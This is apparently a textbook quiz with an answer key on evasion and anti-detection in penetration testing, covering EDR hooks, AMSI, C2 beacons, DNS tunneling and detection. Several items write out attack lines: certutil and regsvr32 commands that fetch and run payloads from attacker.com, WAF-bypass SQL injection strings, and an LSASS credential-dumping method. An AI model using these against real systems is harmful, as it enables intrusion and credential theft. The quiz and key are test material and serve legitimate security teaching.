Chapter 27 Quiz: Evasion and Anti-Detection Techniques

Test your understanding of evasion concepts, techniques, and detection strategies. Select the best answer for each question.

Question 1: Why is evasion testing important in penetration testing engagements?

A) It demonstrates the tester's advanced technical skills to the client B) It reveals whether detection capabilities actually work against realistic adversary techniques C) It allows the tester to remain undetected indefinitely for maximum damage assessment D) It is required by all penetration testing certifications

Question 2: Which detection method analyzes a program's runtime behavior rather than its static characteristics?

A) Signature-based detection B) Heuristic analysis C) Behavioral detection D) YARA rule matching

Question 3: An EDR agent hooks NtAllocateVirtualMemory in ntdll.dll to inspect memory allocation calls. What evasion technique bypasses this hook?

A) Encoding the payload with shikata_ga_nai B) Using direct syscall instructions to call the kernel without going through ntdll.dll C) Changing the process name to a legitimate Windows binary name D) Running the payload from a network share instead of local disk

Question 4: What is AMSI (Antimalware Scan Interface) primarily designed to detect?

A) Malicious network traffic patterns B) Kernel-mode rootkits and drivers C) Malicious scripts and in-memory content submitted by applications like PowerShell D) Hardware-based attacks on the CPU

Question 5: Which of the following is NOT a characteristic of Living Off the Land (LOTL) techniques?

A) Using signed, legitimate system binaries for malicious purposes B) Avoiding the need to drop custom tools to disk C) Exploiting zero-day vulnerabilities in system utilities D) Blending with normal system administration activity

Question 6: A penetration tester uses certutil -urlcache -split -f http://attacker.com/payload.exe C:\temp\payload.exe to download a file. Which MITRE ATT&CK technique does this best represent?

A) T1055 - Process Injection B) T1105 - Ingress Tool Transfer C) T1027 - Obfuscated Files or Information D) T1070 - Indicator Removal

Question 7: DNS tunneling works as a covert channel because:

A) DNS traffic is always encrypted with TLS B) DNS traffic on UDP port 53 is typically allowed through firewalls C) DNS servers cannot log query content D) DNS queries are too small to be analyzed by IDS systems

Question 8: Which of the following is the most reliable indicator of DNS tunneling?

A) DNS queries using UDP instead of TCP B) DNS queries for A records C) Unusually long subdomain labels and high query volume to a single domain D) DNS queries resolving to private IP addresses

Question 9: A WAF blocks the SQL injection payload ' UNION SELECT null,null,null--. Which bypass technique uses MySQL-specific comment syntax?

A) ' UnIoN SeLeCt null,null,null-- B) ' /*!UNION*/ /*!SELECT*/ null,null,null-- C) ' %55NION %53ELECT null,null,null-- D) ' UN/**/ION SEL/**/ECT null,null,null--

Question 10: What does "jitter" refer to in the context of C2 beacon communication?

A) Encryption strength of the beacon traffic B) Random variation added to the beacon interval to avoid pattern detection C) The number of retries before the beacon gives up connecting D) Fragmentation of beacon traffic into smaller packets

Question 11: Which C2 framework is open-source and uses the Go programming language to generate cross-platform implants with mTLS support?

A) Cobalt Strike B) Sliver C) Nighthawk D) Brute Ratel C4

Question 12: Cobalt Strike's malleable C2 profiles allow operators to:

A) Automatically exploit vulnerabilities without user interaction B) Customize the network communication patterns of Beacon to mimic legitimate traffic C) Bypass all EDR solutions regardless of configuration D) Generate undetectable payloads through advanced encryption

Question 13: What is domain fronting?

A) Registering domains that look similar to legitimate domains for phishing B) Using the difference between the TLS SNI field and the HTTP Host header to hide C2 traffic behind legitimate CDN domains C) Purchasing expired domains that previously belonged to trusted organizations D) Creating multiple DNS A records pointing to different C2 servers for redundancy

Question 14: A red team operator needs to dump credentials from LSASS memory without dropping Mimikatz to disk. Which LOTL approach could achieve this?

A) Using rundll32.exe with comsvcs.dll to create a MiniDump of the LSASS process B) Using certutil.exe to decode the LSASS memory space C) Using mshta.exe to load a credential harvesting HTA D) Using bitsadmin.exe to transfer LSASS memory to a remote share

Question 15: JA3 fingerprinting detects C2 traffic by:

A) Analyzing the content of encrypted HTTPS payloads B) Creating a hash of TLS handshake parameters (cipher suites, extensions, etc.) to identify known C2 clients C) Comparing SSL certificate serial numbers against a blocklist D) Monitoring the DNS resolution patterns of C2 domains

Question 16: Which Sysmon Event ID is most useful for detecting process injection techniques?

A) Event ID 1 (Process Creation) B) Event ID 3 (Network Connection) C) Event ID 8 (CreateRemoteThread) D) Event ID 11 (File Creation)

Question 17: An attacker uses regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll to execute code. This technique is known as:

A) DLL sideloading B) Squiblydoo attack C) Process hollowing D) AppLocker bypass via COM hijacking

Question 18: What is the primary limitation of using simple XOR encoding (like shikata_ga_nai) for payload evasion against modern AV solutions?

A) XOR encoding makes payloads too large to transfer over the network B) Modern AV products detect the encoding stub patterns and can emulate/decode the payload C) XOR encoding changes the payload's functionality, causing it to crash D) XOR encoding is only available for 32-bit payloads

Question 19: Which approach best describes the ethical framework for using evasion techniques during authorized testing?

A) Use maximum evasion at all times to provide the most realistic assessment B) Use minimum evasion necessary to achieve test objectives, document all techniques, and provide remediation recommendations C) Avoid evasion entirely since it makes the test harder for defenders to monitor D) Use evasion only during red team exercises, never during standard penetration tests

Question 20: The MITRE ATT&CK tactic dedicated to evasion techniques is:

A) TA0001 - Initial Access B) TA0003 - Persistence C) TA0005 - Defense Evasion D) TA0011 - Command and Control

Answer Key

  1. B - Evasion testing reveals whether an organization's detection capabilities actually work against realistic adversary techniques, providing actionable intelligence for improvement.

  2. C - Behavioral detection monitors what a program does at runtime (API calls, file operations, network connections) rather than analyzing its static characteristics on disk.

  3. B - Direct syscall instructions bypass user-mode hooks in ntdll.dll by calling kernel functions directly, avoiding the hooked API layer where EDR agents inspect calls.

  4. C - AMSI is designed to scan scripts and in-memory content submitted by applications like PowerShell, JScript, and .NET before execution, catching fileless malware.

  5. C - LOTL techniques use legitimate tools for unintended purposes; they do not exploit zero-day vulnerabilities in those tools. The tools function as designed -- it is their application that is malicious.

  6. B - Using certutil to download files from an external server maps to T1105 (Ingress Tool Transfer), as it transfers tools or payloads into the target environment.

  7. B - DNS traffic on UDP port 53 is typically allowed through firewalls because it is essential for normal network operations, making it an effective covert channel.

  8. C - The most reliable indicators of DNS tunneling are unusually long subdomain labels (containing encoded data) and abnormally high query volumes to a single domain.

  9. B - MySQL inline comment syntax /*!...*/ executes the content as SQL while appearing as a comment to WAF regex patterns that look for keywords outside comments.

  10. B - Jitter is the random variation (typically expressed as a percentage) added to the beacon sleep interval to prevent the predictable, periodic check-in pattern that network analysts detect.

  11. B - Sliver is an open-source C2 framework by BishopFox, written in Go, that generates cross-platform implants supporting mTLS, WireGuard, HTTP/S, and DNS protocols.

  12. B - Malleable C2 profiles customize every aspect of Beacon's network communication, including HTTP headers, URIs, data encoding, and timing, to mimic legitimate traffic patterns.

  13. B - Domain fronting exploits the difference between the SNI field (visible to network inspectors) and the HTTP Host header (encrypted) to hide C2 traffic behind legitimate CDN-hosted domains.

  14. A - The comsvcs.dll MiniDump technique uses a legitimate, signed Microsoft DLL to dump LSASS process memory, avoiding the need to drop Mimikatz or other tools to disk.

  15. B - JA3 fingerprinting creates a hash of the TLS ClientHello parameters (cipher suites, extensions, elliptic curves, etc.) to identify specific TLS client implementations, including known C2 frameworks.

  16. C - Sysmon Event ID 8 (CreateRemoteThread) specifically logs when a process creates a thread in another process, which is a core indicator of process injection techniques.

  17. B - The Squiblydoo attack uses regsvr32 to fetch and execute remote scriptlets (.sct files), bypassing application whitelisting since regsvr32 is a signed Microsoft binary.

  18. B - Modern AV products maintain signatures for common encoding stubs (including shikata_ga_nai) and can emulate the decoding process to reveal the underlying payload for analysis.

  19. B - Ethical evasion testing uses the minimum evasion necessary, documents all techniques used, and provides remediation recommendations. The value is in the disclosure and improvement, not in demonstrating stealth for its own sake.

  20. C - TA0005 (Defense Evasion) is the MITRE ATT&CK tactic dedicated to techniques that adversaries use to avoid detection throughout their operation.